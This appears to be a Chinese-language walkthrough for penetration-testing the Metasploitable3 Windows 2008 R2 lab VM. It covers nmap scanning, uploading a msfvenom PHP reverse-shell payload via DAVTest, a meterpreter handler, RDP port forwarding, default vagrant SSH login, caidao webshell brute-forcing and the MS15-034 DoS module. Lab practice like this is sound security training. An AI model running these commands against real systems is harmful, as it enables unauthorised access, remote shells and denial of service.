metasploit2中太容易拿漏洞,如:ms-080_67
在metasploitable3,Windows2008R2版本,在vmfusion虚拟软件中,网卡无法识别的解决办法:
要确保已经安装了VMware tools,没有可以到我提供的下载去下。https://download.csdn.net/download/lm19770429/12330501
然后,删除网卡,再添加,进入系统后,通过设备管理器更新一下驱动,不选默认网卡类型,而是选VMware INC的网卡类型,VMWARE PCI 。即可解决问题。
成功联网metasploitable3系统后,在靶机对其进行信息探测.登录密码:vagrant
nmap -p- -sS -sV -O -v -n --open -oX filename.xml IP地址 # -p- 对全部端口扫描
进入msf
新建一个工作区:win08R2
db_import filename.xml
services
注意观察端口、协议、版本信息
试试浏览各个http协议对应的端口8022、8484、8585
继续浏览web应用,如wordpress
利用DAVTest工具
DAVTest -url http://IP:port/uploads
看到测试信息
还是利用msfvenom -p 载荷 LHOST= LPORT= -f raw > 攻击载荷名称.php
举例:
[点击并拖拽以移动]
接下来:利用DAVtest的上传功能,把生成的php文件传到目标靶机上
注意-uploadloc 一定要给靶机的目录,并指定一个新的文件名
进入msfconsole
启动反射监听,进行攻击
依旧是千年不变的:
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set LHOST
set LPORT
exploit(run)
访问靶机刚才上传的漏洞后门文件,进行反射监听,进入后渗透环境meterpreter
meterpreter>sysinfo
ls
shell
远程登录一下靶机3389端口,再接连接靶机端口,行不通时,可以把远程端口绑定到本地端口
rdesktop 192.168.1.151:3389 这是登录不了的
利用meterpreter对的端口转发功能
portfwd -h
portfwd add -l 8888 -p 3389 -r 192.168.1.151
攻击机端口 远程端口 远程主机IP
再用rdesktop进行远程主机登录
rdesktop 127.0.0.1:8888
what???又出错
如果不行,就再绑定一次,重来一遍,计算机就是这样
可以通过nmap扫描后的信息,可以看到22 端口
ssh漏洞利用:
ssh vagrant@192.168.1.151
scp vagrant@192.168.1.148:path/文件名 #远程下载 含flag文件
ssh -L 3389:localhost:3389 vagrant@192.168.1.151 --------------利用ssh 来做一个端口转发 强制开启3389端口 服务器本身就有防火墙,在nmap也扫不到
再用rdesktop 登录以下远程靶机
rdesktop 127.0.0.1:3389
在msfconsole中
search caidao
use auxiliary/scanner/http/caidao_bruteforce_login
show
set RHOSTS
set TARGETURI
set PASS_FILE #可以使用默认的设置
run
如果运气好,会看到密码
在命令行:
java -jar cknife.jar
80端口--http
MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞(远程蓝屏代码)
微软IIS 6.0以上的的Windows Server 2008 R2/Server 2012/Server 2012
R2以及Windows 7/8/8.1操作系统都受到这个漏洞的影响
msf:use auxiliary/dos/http/ms15_034_ulonglongadd ----模块位置
set RHOSTS
run